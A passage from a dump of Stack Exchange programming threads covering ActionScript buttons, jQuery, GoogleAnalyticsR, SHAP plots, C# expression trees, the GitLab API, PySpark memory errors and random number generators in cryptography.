if (bg.currentFrame==44)\n {\n bg.backtoinvest44.removeEventListener(MouseEvent.CLICK, menu);\n bg.donebtn44.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"donebtn44\")\n {\n bg.gotoAndStop(45);\n bg.backtoinvest45.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn45.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==45)\n {\n bg.backtoinvest45.removeEventListener(MouseEvent.CLICK, menu);\n 
bg.okbtn45.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okbtn45\")\n {\n bg.gotoAndStop(46);\n bg.backtoinvest46.addEventListener(MouseEvent.CLICK, menu);\n bg.okbtn46.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==46)\n {\n bg.backtoinvest46.removeEventListener(MouseEvent.CLICK, menu);\n bg.okbtn46.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okbtn46\")\n {\n bg.gotoAndStop(47);\n bg.okbtn47.addEventListener(MouseEvent.CLICK, menu);\n }\n else if (bg.currentFrame==47)\n {\n bg.okbtn47.removeEventListener(MouseEvent.CLICK, menu);\n }\n if (m.target.name == \"okbtn47\")\n {\n bg.gotoAndStop(48);\n bg.backtoinvest48.addEventListener(MouseEvent.CLICK, menu);\n }\n }\n }\n }\n}\n<\/code>\nComment: Can you reproduce the problem with less code. That always helps me out to have a smaller reproduction of the broken code. Sometimes I even solve the problem by doing this.\nAnswer: Although useful to provide \"all the code\", in this case, you're obfuscating the core issue you're dealing with. Nowhere inside of it can the words \"View Portfolio\" or \"Investments\" be found, and with all the other button registrations, it'd require reading line-by-line to see if you typoed a button.\nFurthermore, as these interface elements appear not to have been created dynamically (but rather with the Flash IDE, thereby existing in the unseen library), there's no way for us to tell what the correct variable names should be.\nBe concise. Provide the smallest possible amount of code to reproduce the problem.\nSimplify. Anytime you see a repeating pattern of code, it probably means you can reduce with either a function or a loop.\nAll of these buttons are either registering or unregistering for '(MouseEvent.CLICK, menu)'. You can do this much faster with a loop, for example...\n<code>var buttons:Array = [\n bg.ok,\n bg.menubtn,\n bg.Balinq,\n bg.Transinq,\n bg.Fintrxns,\n bg.invest,\n bg.others,\n bg.passchange\n]\n\nfor (var btn in buttons) {\n btn.addEventListener(MouseEvent.CLICK, menu);\n}\n<\/code>\nNow when you need to do something to all those buttons, there's only one place you have to look.\n\nWhen a button is clicked, you're testing the name of the object and unregistering it. You can avoid this test and simply unregister the target. Ergo rather than this:\n<code>if (m.target.name == \"menubtn\") {\n bg.menubtn.removeEventListener(MouseEvent.CLICK, menu);\n}\n<\/code>\nJust do:\n<code>m.target.removeEventListener(MouseEvent.CLICK, menu);\n<\/code>\n\nAnother way to simplify your code is to make use of the switch operator. Methods like this...\n<code>if (m.target.name == \"viewport\") {\n \/\/ do a\n}\nif (m.target.name == \"viewhist\") {\n \/\/ do b\n}\nif (m.target.name == \"subscribe\") {\n \/\/ do c\n}\n<\/code>\nCan become...\n<code>switch (m.target.name) {\n case \"viewport\": \/\/ do a\n break;\n case \"viewhist\": \/\/ do b\n break;\n case \"subscribe\": \/\/ do c\n break;\n}\n<\/code>\nThis is handy when you know you're always comparing to test against the same variable.\n\nIn the end, reuseable code means for lightweight code which is easily maintainable, cuts down on grunt-work, and makes for a much more readable document. 
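The three suggestions above (register buttons in a loop, unregister <code>m.target</code> directly, and switch on the name) all point toward the same refactor: keep the navigation data in one table and drive every click from it. Purely as an illustration of that structure, sketched here in Python rather than ActionScript, with invented names (<code>NAV</code>, <code>goto_frame</code> and the callback arguments are not part of the original project):
<code># Hypothetical navigation table: clicked button -> (target frame, buttons living on that frame)
NAV = {
    "ok":      (2,  ["menubtn"]),
    "menubtn": (3,  ["Balinq", "Transinq", "Fintrxns", "invest", "others", "passchange"]),
    "invest":  (27, ["backtomenu27", "viewport", "viewhist", "subscribe", "redeem"]),
    # ... one entry per screen instead of one if-branch per button
}

def on_click(button_name, unregister, register, goto_frame):
    """Single handler: unhook the clicked button, jump to the frame, hook up the new screen."""
    frame, buttons = NAV[button_name]
    unregister(button_name)
    goto_frame(frame)
    for name in buttons:
        register(name)
</code>
The same table-driven shape carries straight back to ActionScript with a plain Object map plus the registration loop shown in the answer.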
With what you're doing here, I'm fairly confident you could bring it from 650 down to about 50 lines of code.\n","meta":{"source":"stackoverflow","title":"Buttons Not Functioning as expected","dup_signals":{}},"subset":"stackexchange"} +{"text":"use jquery .length only on visible fields\n\nQuestion: I have a form that uses javascript to dynamically add fields when an \"Add field\" button is clicked. Additionally, users can remove fields by pressing a \"remove field\" button. If a field is removed, it is hidden and a hidden field called '_destroy' for that field is set to true. I am trying to make it so that a user can add a maximum of 3 fields. So far I have the following code:\n<code>function add_fields(link, association, content) {\n if($(\".order_number\").length > 2){\n alert(\"A schedule can have a maximum of 3 tasks.\")\n }else{\n \/\/add field code here\n }\n}\n<\/code>\nHere is the html:\n<code><tr class=\"add-task\">\n <td><input id=\"schedule_tasks_attributes_1394554386530_title\" \n class=\"field\" type=\"text\" \n name=\"schedule[tasks_attributes][1394554386530][title]\" \/>\n <\/td>\n <td>\n <input id=\"schedule_tasks_attributes_1394554386530_order_number\" \n class=\"order_number\" type=\"hidden\" \n name=\"schedule[tasks_attributes][1394554386530][order_number]\" \n value=\"4\" \/> \n <div id=\"remove_schedule_field_employer\">\n <input id=\"schedule_tasks_attributes_1394554386530__destroy\" \n type=\"hidden\" value=\"false\" \n name=\"schedule[tasks_attributes][1394554386530][_destroy]\" \/>\n <a onclick=\"remove_fields(this); return false;\" href=\"#\"><\/a>\n <\/div>\n <\/td>\n<\/tr>\n<\/code>\nThe problem is that the order number exists even when the field to be destroyed is hidden, so the alert message will come up even when the field is hidden. How do I make it so that the alert message only happens when the length of visible fields is greater than 3? I have tried the jquery .is(':visible') method but it returns a boolean, not the field, so I can't use .length on it.\nUPDATE:\nMaybe this will help. This is the js that removes the field. 'fieldo' is the class that surrounds the field.\n<code>function remove_fields(link) {\n $(link).prev(\"input[type=hidden]\").val(\"1\");\n $(link).closest(\".fieldo\").hide();\n}\n<\/code>\nComment: Maybe check your console to see if there are any other Javascript errors halting execution.\nAnswer: Actually it is kind of bug in jQuery, issue is the underscore in class name of element. \nTry removing it see demo:\n<code>$(\".ordernumber:visible\").length\n<\/code>\nComment: Thanks, that doesn't work though. The alert won't even appear.\nComment: see demo I have added. 
http:\/\/jsfiddle.net\/4RAde\/ Here it is alerting 2 and ignoring the hidden input.\nComment: in your code if alert is not coming it means it is going to else case which is correct.\nComment: Its not correct, because there are three visible fields, so the alert should appear.\nAnswer: Try:\n<code>function add_fields(link, association, content) {\n if($(\".order_number:visible\").length > 2){\n alert(\"A schedule can have a maximum of 3 tasks.\")\n }else{\n \/\/add field code here\n }\n}\n<\/code>\nThis will change the jQuery selector to select elements with class <code>.order_number<\/code> that has display set to 'block'\nComment: \"I have tried the jquery .is(':visible') method but it returns a boolean, not the field, so I can't use .length on it.\"\nComment: Ah, maybe try `$(\".order_number:visible\").length`\nComment: Thanks, tried that too, but unfortunately its still not working. The alert won't even appear with it.\nComment: Hmm, the :visible pseudo class looks only for CSS `display:block;` How are fields being removed?\nComment: I added the remove field code to the question content.\nAnswer: Use <code>.filter(':visible')<\/code> instead of <code>.is(':visible')<\/code>.\nComment: Thanks, I tried that, but it also does not work. The alert doesn't even appear.\nComment: @Philip7899: Oh, when you say \"hidden\", do you mean ``? `$('.order_number:not([type=\"hidden\"])')`.\nComment: Thanks, tried that but still not working... It still adds the field.\nComment: @Philip7899: Okay, that code did help. Thanks. Your ``s are the ones with the `order_number` class. If you don't want to change the HTML, I think `$('.order_number').closest('td').filter(':visible').length` would work, but it would probably better, in `remove_fields`, to do something like `$(link).prev('input[type=hidden]').val('1').addClass('removed')` and then check `$('.order_number:not(.removed)')`.\nComment: Thanks, this is closer. Now the alert message appears but it will appear even when there are only two or one visible fields also. I think its because the \"addClass('removed')\" is being applied to the wrong hidden field. I think its being applied to the field with id=\"schedule_tasks_attributes_1394554386530__destroy\" instead of the one with class=\"order_number\".\nComment: do you have any ideas?\nComment: Did you try the first one?\n","meta":{"source":"stackoverflow","title":"use jquery .length only on visible fields","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to Fix Row Limits Export, Google analytics to R\n\nQuestion: Hi I'm using GoogleAnalyticsR to import my data from Google Analytics but I'm having a problem because it only downloads 1,000 rows from a total of 1,000,000.\nAny advice how to download all 1,000,000?\nHere's my code!\n<code>df1 <- google_analytics_4(my_id, \n date_range = c(\"2016-05-13\", \"2017-05-13\"),\n metrics = c(\"pageviews\"),\n dimensions = c(\"pagePath\"))\n<\/code>\nComment: You need to look in to pagination you can only request 10000 rows at a time. 
look for pageToken\nAnswer: By default it gets 1000 rows, if you set <code>max = -1<\/code> in your call it gets everything:\n<code>df1 <- google_analytics_4(my_id, \n date_range = c(\"2016-05-13\", \"2017-05-13\"),\n metrics = \"pageviews\",\n dimensions = \"pagePath\",\n max = -1)\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to Fix Row Limits Export, Google analytics to R","dup_signals":{}},"subset":"stackexchange"} +{"text":"Shap plot crops\/truncates the feature names\n\nQuestion: <code>import csv\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot \nimport shap\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import StandardScaler\ndf1=pd.read_csv(\".\/wine.data\",sep=\",\",encoding='utf_8_sig')\nX_train = df1\nle = preprocessing.LabelEncoder()\nX_train['alc_class'] = le.fit_transform(X_train.alc_class.values)\nprint(X_train.columns)\n\nprint(X_train.describe())\n\ny = X_train['alc_class']\nX = X_train.drop(columns='alc_class')\nimport xgboost as xgb\n\n# split X and y into training and testing sets\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.30, random_state = 2100, stratify = y)\n\n# import XGBClassifier\nimport xgboost as xgb\nfrom sklearn.metrics import mean_squared_error\nDM_train = xgb.DMatrix(data = X_train, \n label = y_train)\n \n \nDM_test = xgb.DMatrix(data = X_test,\n label = y_test)\n\nxgb_param_grid = {\n 'colsample_bytree': np.linspace(0.5, 0.9, 2),\n 'n_estimators':[30],\n 'max_depth': [5],\n 'learning_rate':[0.01],\n 'alpha':[10],\n 'objective':['binary:logistic'],\n 'tree_method':['hist'],\n 'min_child_weight': [1],\n 'gamma': [0.5],\n 'subsample': [0.6],\n\n}\n\n \n# instantiate the classifier \nxgb_clf = xgb.XGBClassifier(use_label_encoder=False, eval_metric=\"auc\")\n\n# perform 5 fold cross-validation using mean square error as a scoring method\ngrid_mse = GridSearchCV(estimator = xgb_clf, param_grid = xgb_param_grid, scoring = 'neg_mean_squared_error', cv = 5, verbose = 1)\n\n# Fit grid_mse to the data, get best parameters and best score (lowest RMSE)\n\ngrid_mse.fit(X_train, y_train)\n\nprint(\"Best parameters found: \",grid_mse.best_params_)\nprint(\"Lowest RMSE found: \", np.sqrt(np.abs(grid_mse.best_score_)))\n\n#Predict using the test data\n\ny_pred = grid_mse.predict(X_test)\ny_pred_prob = grid_mse.predict_proba(X_test)\n\nprint(\"Root mean square error for test dataset: {}\".format(np.round(np.sqrt(mean_squared_error(y_test, y_pred)), 2)))\n\nfrom sklearn.metrics import accuracy_score, roc_curve, auc,recall_score,precision_score, precision_recall_curve,f1_score, classification_report, confusion_matrix,roc_auc_score\n\nprint('XGBoost model accuracy score: {0:0.4f}'. format(accuracy_score(y_test, y_pred)))\nprint('XGBoost model F1 score: {0:0.4f}'. 
format(f1_score(y_test, y_pred, average='weighted')))\n\nprecision, recall, thresholds = precision_recall_curve(y_test, y_pred)\narea = auc(recall, precision)\nprint(\"----------------\")\nprint(\"\\n\\n Evaluation Metrics \\n\\n\")\n\naucroc_score = roc_auc_score(y_test, y_pred_prob[:,1])\nprint(\"Area Under ROC Curve: \",aucroc_score)\n# roc curve for models\nfpr, tpr, thresh = roc_curve(y_test, y_pred_prob[:,1], pos_label=1)\n\n# roc curve for tpr = fpr \nrandom_probs = [0 for i in range(len(y_test))]\np_fpr, p_tpr, _ = roc_curve(y_test, random_probs, pos_label=1)\n\nprint(\"confusion_matrix \", confusion_matrix(y_test,y_pred))\nprint(\"classification_report \", classification_report(y_test,y_pred))\n\nexplainer = shap.TreeExplainer(grid_mse.best_estimator_)\nshap_values = explainer(X_train)\nshap.plots.beeswarm(shap_values, plot_size = 1.8, max_display = 13)\n\nprint(grid_mse.best_estimator_.feature_importances_)\nfor col,score in zip(X_train.columns,grid_mse.best_estimator_.feature_importances_):\n print('%s, %0.3f ' %(col,score))\n<\/code>\n\nI have long feature names and I plot the beeswarm shapley plots and feature names get truncated. I would like the full feature name to be displayed on y-axis. Any help would be greatly appreciated.\nI have tried changing the plot size but it did not work.\nComment: Please [reprex]\nComment: @SergeyBushmanov I have now added the MWE. kindly have a look.\nComment: What's your environment? Because in jupyter notebook arbitrarily long feature names are displayed correctly.\nComment: I use python3.6 in Ubuntu. I do not use Jupyter notebook.\nComment: Then i will conclude its not an issue with shap package which plots fine here. Rather its your ide or matplotlib plotting backend\nComment: yes i have tried in the .pynb and it's working fine. But i would like to know what can be done with matplotlib plotting backend to fix the issue if i do not want to use the noteboooks?\nAnswer: Add a flag to hide the plot. 
Then save the output with a tight bbox layout:\n<code>path = 'save_path_here.png'\nshap.plots.beeswarm(shap_values, plot_size = 1.8, max_display = 13, show=False)\nplt.savefig(path, bbox_inches='tight', dpi=300)\n<\/code>\n","meta":{"source":"stackoverflow","title":"Shap plot crops\/truncates the feature names","dup_signals":{}},"subset":"stackexchange"} +{"text":"Not able to identify the element in dropdown\n\nQuestion: I have a drop down, and clicking it will display the list of branches.\nI am able to identify the drop down (arrow inverted in the UI) and click on it, by using the below code.\n<code>\/\/click on the drop down\n@FindBy(xpath =\"\/\/[@id=\\\"miniTable\\\"]\/tbody\/tr[5]\/td[1]\/div\/div\/div[1]\")\nWebElement selectbranch;\n<\/code>\nNote that there is no select tag for the drop down.\nIssue:\nI am able to identify the drop down and click on it, but I am not able to get one of the branches from the drop down.\nComment: Can you please share the html of the dropdown item.\nAnswer: Since your drop down is not made of a <code>Select<\/code> tag, the <code>Select<\/code> class from Selenium will not work.\nAs you have mentioned that you are able to click on the drop down, you can use this code after that:\n<code>List<WebElement> options = driver.findElements(By.xpath(\" your locator\"));\nfor(WebElement element : options){\n if(element.getText().equals(\" the value you want to select from drop down\")){\n element.click();\n}\n}\n<\/code>\nIn place of <code>your locator<\/code>, you'd have to give a common locator for all the elements of the drop down.\nLet me know if you have any more concerns.\nComment: my concern is, when I click on the drop down, I can't see the list of branches in the html tag; only when I click on any branch manually can I see the branch name in the html code\nComment: @saidayapule : So, write the locator that should be common for all the options. You don't really have a choice here since a select tag is not present in the HTML\nComment: yes, to write a locator common to all the options, I should be able to identify them, but when I click on the drop down (right click, inspect element), I am able to find a locator for the drop down but no locator for the list of branches; please see the images attached\n","meta":{"source":"stackoverflow","title":"Not able to identify the element in dropdown","dup_signals":{}},"subset":"stackexchange"} +{"text":"The binary operator Multiply is not defined for the types 'System.Int32' and 'System.Double'.\n\nQuestion: Why does the following code throw an exception at runtime, whereas doing it in the traditional way compiles without problem?\n<code>var left = Expression.Constant(25d);\nvar right = Expression.Constant(20);\n\n\/\/ Throws an InvalidOperationException!\nvar multiplyExpression = Expression.Multiply(left, right); \n\nvar multiply = 25d * 20;\nDebug.WriteLine(multiply.ToString()); \/\/ Works normally!\n<\/code>\nI won't use <code>Expression.Convert<\/code> since I can't determine exactly which expression should be converted.\nComment: Because in the traditional way, the compiler inserts the (moral equivalent of) an `Expression.Convert` - using type precedence rules to determine which side to convert.\nComment: Just check the type of \"multiply\", that will tell you which side needs to be converted.\nComment: Which expression would the C# compiler have converted in this case?\nAnswer: Well, I figured out how to solve the problem using TypeCode enumeration to determine which node would have higher type
precision, then convert the latter node's type to the former's type, and vice versa:\n<code> private static void Visit(ref Expression left, ref Expression right)\n {\n var leftTypeCode = Type.GetTypeCode(left.Type);\n var rightTypeCode = Type.GetTypeCode(right.Type);\n\n if (leftTypeCode == rightTypeCode)\n return;\n\n if (leftTypeCode > rightTypeCode)\n right = Expression.Convert(right, left.Type);\n else\n left = Expression.Convert(left, right.Type);\n }\n<\/code>\nComment: Oh dam... TypeCode isn't available on Windows Store. so close... ;(\nAnswer: <code>var left = Expression.Constant(25d);\nvar right = Expression.Constant(20);\nvar multiplyExpression = Expression.Multiply(\n left, \n Expression.Convert(right, left.Type)); \n<\/code>\nOr, if you don't know that the left side has higher precision, and you want to always end up with a <code>double<\/code> result, you could say something like:\n<code>Expression left = Expression.Constant(2);\nExpression right = Expression.Constant(25.1);\nleft = Expression.Convert(left, typeof(double));\nright = Expression.Convert(right, typeof(double));\nvar multiplyExpression = Expression.Multiply(left, right); \n<\/code>\nComment: @Islam Ibrahim: There are a number of possibilities, and it's usually best to go with the simplest strategy that will work for your purposes. Perhaps if you share more information on your requirements, and what this is used for, we could help you find a solution to match. For example, do you know what type you want to end up with ahead of time, or will that change depending on the inputs?\nComment: Well, this looks good, but how could this be done if the operands are of type float, decimal?\nAnswer: Well the error message in your title is telling you why there is an exception.\nThere is no <code>Expression.Multiply<\/code> method defined which takes a <code>System.Int32<\/code> and a <code>System.Double<\/code> as arguments.\nThe <code>*<\/code> will work because it's lower level and your values will be type cast automatically.\nAnswer: <code>var left = Expression.Constant(25d);\nvar right = Expression.Constant((double)20);\n\nvar multiplyExpression = Expression.Multiply(left, right); \/\/ works\n<\/code>\nComment: This can't be done directly, I should call Expression.Convert somehow.\n","meta":{"source":"stackoverflow","title":"The binary operator Multiply is not defined for the types 'System.Int32' and 'System.Double'.","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to list all the project variables in a gitlab project via GitLab V4 api\n\nQuestion: I'd like to list all the project variables in a gitlab project. I have followed their official documentation but seems like I couldn't get it to work.\nBelow is my code:\n<code>import gitlab, os\n\n# authenticate\ngl = gitlab.Gitlab('https:\/\/gitlab.com\/', private_token=os.environ['GITLAB_TOKEN'])\n\ngroup = gl.groups.get(20, lazy=True)\nprojects = group.projects.list(include_subgroups=True, all=True)\nfor project in projects:\n project.variables.list()\n<\/code>\nError:\n\nAttributeError: 'GroupProject' object has no attribute 'variables'\nAnswer: The problem is that <code>group.list<\/code> uses the groups list project API and returns <code>GroupProject<\/code> objects, not <code>Project<\/code> objects. 
<code>GroupProject<\/code> objects do not have a <code>.variables<\/code> manager, but <code>Project<\/code> objects do.\nTo resolve this, you must extract the ID from the <code>GroupProject<\/code> object and call the projects API separately to get the <code>Project<\/code> object:\n<code>group = gl.groups.get(20, lazy=True)\ngroup_projects = group.projects.list(include_subgroups=True, all=True)\nfor group_project in group_projects:\n project = gl.projects.get(group_project.id) # can be lazy if you want\n project.variables.list()\n<\/code>\nComment: Thanks!! That worked. I'm specifically looking to list protected variables only, instead of all the vars. Do you if there is a special param for that? I have tried `project.variables.list(protected=True)` but that didn't work.\nComment: As far as I know, there is no filtering for that in the [list API itself](https:\/\/docs.gitlab.com\/ee\/api\/project_level_variables.html) (therefore no such keyword parameter in the Python API wrapper) but it is relatively simple to do that filtering in python: `protected_variables = [var for var in project.variables.list(all=True) if var.protected is True]` @blackPanther\nComment: Great, it did the trick, thanks! now `protected_variables` is a list of classes like `[, ]`, whereas I'm just looking for `[API_TOKEN, WEBHOOK_URL]`\nComment: @blackPanther those are _instances_, not classes. You can extract the information you want from the object. For example `var.value` -- if I've answered your original question, please consider voting and accepting it. If you still need more help beyond that, consider raising a separate question.\nAnswer: According to the FAQ:\n\nI get an <code>AttributeError<\/code> when accessing attributes of an object retrieved via a <code>list()<\/code> call.\nFetching a list of objects, doesn't always include all attributes in the objects. To retrieve an object with all attributes use a <code>get()<\/code> call.\n\nAdapting the example to your code:\n<code>for project in projects:\n project = gl.projects.get(project.id)\n project.variables.list()\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to list all the project variables in a gitlab project via GitLab V4 api","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to fix PySpark, jdk memory -issue?\n\nQuestion: I seem to have a memory problem using PySpark's ML package. I am Trying to use ALS.fit on a 40 million rows dataframe. Using JDK-11 produced the error: \n<code>\"java.lang.NoSuchMethodError: sun.nio.ch.DirectBuffer.cleaner()Lsun\/misc\/Cleaner\" \n<\/code>\nIt worked with 13 million rows, so I guess its a memory cleaning issue.\nI tried it using java JDK-8, like proposed here: \nApache Spark method not found sun.nio.ch.DirectBuffer.cleaner()Lsun\/misc\/Cleaner; \n, but I still run into an error, because heap Memory doesnt suffice: I get this error message: \n<code>\"... 
java.lang.OutOfMemoryError: Java heap space ...\"\n<\/code>\nSomeone has an idea how to circumvent this?\nI am using Ubuntu 18.04 LTS and Python 3.6 and PySpark 2.4.2 .\nedit: \nthis is how I patched together my Spark Context configuration: \n\nI have 16 gb of RAM\n\n<code>conf = spark.sparkContext._conf.setAll([\n (\"spark.driver.extraJavaOptions\",\"-Xss800M\"),\n (\"spark.memory.offHeap.enabled\", True),\n (\"spark.memory.offHeap.size\",\"4g\"),\n ('spark.executor.memory', '4g'), \n ('spark.app.name', 'Spark Updated Conf'),\n ('spark.executor.cores', '2'), \n ('spark.cores.max', '2'),\n ('spark.driver.memory','6g')])\n<\/code>\nI'm not sure if this makes sense!\nThese are the first lines of the error message: \n<code>[Stage 8:==================================================> (186 + 12) \/ 200]19\/07\/02 14:43:29 WARN MemoryStore: Not enough space to cache rdd_37_196 in memory! (computed 3.6 MB so far)\n19\/07\/02 14:43:29 WARN MemoryStore: Not enough space to cache rdd_37_192 in memory! (computed 5.8 MB so far)\n19\/07\/02 14:43:29 WARN BlockManager: Persisting block rdd_37_192 to disk instead.\n19\/07\/02 14:43:29 WARN BlockManager: Persisting block rdd_37_196 to disk instead.\n19\/07\/02 14:43:29 WARN MemoryStore: Not enough space to cache rdd_37_197 in memory! (computed 3.7 MB so far)\n19\/07\/02 14:43:29 WARN BlockManager: Persisting block rdd_37_197 to disk instead.\n19\/07\/02 14:43:29 WARN MemoryStore: Not enough space to cache rdd_37_196 in memory! (computed 3.6 MB so far)\n[Stage 8:======================================================>(197 + 3) \/ 200]19\/07\/02 14:43:29 WARN MemoryStore: Not enough space to cache rdd_37_192 in memory! (computed 5.8 MB so far)\n[Stage 9:> (0 + 10) \/ 10]19\/07\/02 14:43:37 WARN BlockManager: Block rdd_40_3 could not be removed as it was not found on disk or in memory\n19\/07\/02 14:43:37 WARN BlockManager: Block rdd_40_4 could not be removed as it was not found on disk or in memory\n19\/07\/02 14:43:37 WARN BlockManager: Block rdd_40_7 could not be removed as it was not found on disk or in memory\n19\/07\/02 14:43:37 WARN BlockManager: Block rdd_41_3 could not be removed as it was not found on disk or in memory\n19\/07\/02 14:43:37 WARN BlockManager: Block rdd_41_4 could not be removed as it was not found on disk or in memory\n19\/07\/02 14:43:37 WARN BlockManager: Block rdd_41_7 could not be removed as it was not found on disk or in memory\n19\/07\/02 14:43:38 ERROR Executor: Exception in task 7.0 in stage 9.0 (TID 435)\njava.lang.OutOfMemoryError: Java heap space\n19\/07\/02 14:43:39 WARN BlockManager: Block rdd_40_5 could not be removed as it was not found on disk or in memory\n19\/07\/02 14:43:38 ERROR Executor: Exception in task 4.0 in stage 9.0 (TID 432)\njava.lang.OutOfMemoryError: Java heap space\n at scala.collection.mutable.ArrayBuilder$ofInt.mkArray(ArrayBuilder.scala:327)\n[...]\n<\/code>\nComment: How did you solve this problem? I am having the same problem while saving the dataframe.\nAnswer: Eventually you probably want to expand memory heap with the help of -Xmx parameter.\nYou can determine how much memory it needs using various methods. 
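For a PySpark driver, the JVM heap is normally sized through Spark's own settings rather than a bare -Xmx: spark.driver.memory and spark.executor.memory map onto the driver and executor heaps, and the driver value only takes effect if it is fixed before the driver JVM starts (via spark-submit --driver-memory, spark-defaults.conf, or the session builder, not by reconfiguring a context that is already running). A minimal sketch, with sizes that are placeholders rather than recommendations for this workload:
<code>from pyspark.sql import SparkSession

spark = (
    SparkSession.builder
    .appName("als-memory-sketch")
    .config("spark.driver.memory", "6g")            # driver heap; must be set before the JVM exists
    .config("spark.executor.memory", "4g")          # executor heap
    .config("spark.sql.shuffle.partitions", "400")  # more, smaller partitions -> smaller per-task footprint
    .getOrCreate()
)
</code>
For ALS specifically, setting a checkpoint directory and keeping the ratings DataFrame well partitioned also limit how much intermediate state has to sit on the heap at once.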
You can simply increase heap until it works, or you can define very large heap and then see how much of it is used and make it proper.\nYou can monitor heap usage with different ways, for example:\n\nrun your application with options to write garbage collection log -XX:+PrintGCTimeStamps -XX:+PrintGCDetails -verbose:gc -Xloggc:\/some_path\/gc.log\nrun your application with command line option: -XX:NativeMemoryTracking=summary or -XX:NativeMemoryTracking=detail and use jcmd utility: jcmd VM.native_memory summary\nor some other way, even using graphical utilities, just google it if you need it.\nComment: Thanks, how exactly do I use the -XmX parameter?\n\nI edited my question with my newly added conf call to spark context.\nComment: Unfortunately I know nothing about PySpark. Maybe you should add this parameter to spark.driver.extraJavaOptions, or maybe there is some other PySpark option for that. If you just run java program, you simply add it to the command line.\n","meta":{"source":"stackoverflow","title":"How to fix PySpark, jdk memory -issue?","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is the use of REAL random number generators in cryptography?\n\nQuestion: I understand the use of pseudo-random number generators. I am not getting mixed up between these and \"real\" random number generators.\nHowever, I don't understand for what a real random number generator is used.\nIf it is not deterministic, how can it be used in an algorithm?\nComment: You need a real random number generators to seed the pseudo-random number generator. Additionally, most *true* random number generators require post-processing of the random output, which is often done using pseudo-random generators.\nComment: @jug Yup, entropy sources may even have a particular bias to bits valued 0 or 1. Normally you need at least a whitening technique to get something looking like a random number. Feeding that as a seed into a PRNG is certainly helping to get the right quality. Be careful not to confuse a source of entropy with a secure random number generator.\nAnswer: For some types of algorithms (or protocols) we only need non-guessable (by the attacker) bits\/numbers, not reproducible non-guessable ones (like from a deterministic PRNG).\nIn this cases, \"real\" random numbers are in theory (i.e. from an information-theoretic point of view, not a cryptographic one) better, since they can't be guessed (or even influenced) by an attacker, even if she could break our PRNG.\nSome cases that I can now think of, where we don't need deterministic random numbers:\n\nkey generation (both symmetric and asymmetric)\ninitialization vectors for block cipher modes of operation (these are usually sent with the message, so the same plaintext will not result in recognizable ciphertext for the next message)\nrandom padding in asymmetric encryption (for example OAEP)\nsalts for password storage (these are stored with the hash)\nchallenges in zero knowledge proofs (sent to the partner)\nrandom values used in digital signatures (the <code>k<\/code> in DSA)\none time pads (OTP) (Here, for the security proof, we actually need \"real\" random numbers.)\nchaffing and winnowing\n\nIn practice, pseudo-random bits are cheaper and just as secure for real-world attackers (e.g. 
with resources limited by our earth mass and universe lifetime), as long as the PRNG is not broken and has enough entropy input to start with.\n(If the attacker can control the seemingly random input to the \"true random\" generator, this would be even worse than a good PRNG.)\nOften for these uses we use a combination of a cryptographically secure (deterministic) PRNG and an entropy pool, which gets filled (and re-filled) by random bits gathered by the OS. This would be a non-deterministic PRNG.\nComment: So basically the use for a REAL random number generator is for creating random bits, to reduce entropy, because humans cannot think of data that is truly random\nComment: to *increase* entropy.\nAnswer: Many of the uses of a True RNG fall into the general category of generation, without persistent storage, of a value that is different with high probability from any value determined otherwise.\nA value that is different with high probability from any value determined otherwise is very useful in cryptographic protocols. For example, under classic CBC encryption with multiple messages enciphered with the same key, an IV needs to be distinct from a previous IV (which is necessary to conceal a possible repeat of the plaintext), and distinct from the XOR of the first block of plaintext with any value that has or will ever enter the input of the block cipher (which is necessary to ensure confidentiality of that first block of plaintext under the assumption that all other plaintext is known).\n\"Without persistent storage\" requirement rules out a Pseudo RNG, and greatly simplify things: in the case of PRNG, persistent storage needs to be made confidential and\/or integrity-protected, which is plain impossible on a regular PC under the basic \"maid boots USB stick\" security threat. Sometime there is just no persistent storage (boot from CD-ROM), or it is a bit slow.\nAnother reason to use a True RNG is protection of the implementation of a cryptographic algorithm from side-channel attacks, a process often called \"masking\". For example, protection against DPA of the crypto-engines used in Smart Cards uses random data for that purpose. Using a Pseudo RNG here would create a chicken-and-egg problem (since secure PRNGs use cryptographic algorithms); while this might be solvable, it is simply easier and much faster to use a TRNG.\nAnswer: That's the whole point. With a pseudo-random number generator, one is able to (theoretically) repeat the same sequence of numbers that appear to have been chosen at random (one just needs to know the seed), while with a true random number generator they can not (one needs to know all bits of output).\nThis is useful for generating private keys of symmetric and asymmetric cryptosystems. By using a true random number generator, the cryptanalyst is not able to guess the private key as easily using a brute force attack. (Of course, if the seed and state of the PRNG is large enough, there is practically no way to do it, too.) This is why it pays to re-seed your (pseudo) random number generator every time you generate a private key.\n","meta":{"source":"crypto.stackexchange","title":"What is the use of REAL random number generators in cryptography?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Force WhenEvent to respect default stepsize\n\nQuestion: I have to numerically integrate an equation system and monitor the accumulating datapoints. 
